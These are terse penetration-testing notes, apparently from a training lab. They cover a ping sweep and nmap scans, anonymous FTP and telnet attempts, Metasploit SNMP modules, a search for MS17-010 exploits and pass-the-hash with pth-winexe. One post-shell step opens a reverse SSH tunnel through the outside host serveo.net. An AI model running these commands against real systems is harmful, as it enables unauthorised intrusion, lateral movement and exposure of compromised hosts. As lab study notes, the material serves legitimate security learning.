identify alive hosts

seq 1 254
### ping every address once and save the replies
for i in $(seq 1 254); do ping -c 1 '172.16.60.'$i; done > output.txt
### hosts that answered are on the 'bytes from' lines
grep 'bytes from' output.txt | cut -d ' ' -f 4 | tr -d ':'

nmap 172.16.60.0/24    ### check alive hosts, check top 1025 well known ports
nmap -sn 172.16.60.1/24    ### -sn only checks whether the host is up
nmap 172.16.60.1/24 -p-    ### -p- checks the whole port range
nmap -sS -sV 172.16.1.172    ### -p5988: check a specific port

attempts on open ports found via nmap

ftp    ### try anonymous/anonymous
ftp 172.16.1.19
telnet 172.16.1.19 21
telnet 172.16.1.19

after you have shell access
ssh -R cyberacademy2018:80:localhost:80 serveo.net

rtsp 554    ### with vlc, in the vlc network url:
rtsp://172.16.1.19:554

snmp
sudo msfconsole
auxiliary
set community filename
exploit

search ms17-010 windows
# searchsploit "windows server 2008"
# locate windows/remote/41987.py

./pth-winexe -U WORKGROUP/user%hash //172.16.1.204 cmd    ### pass the hash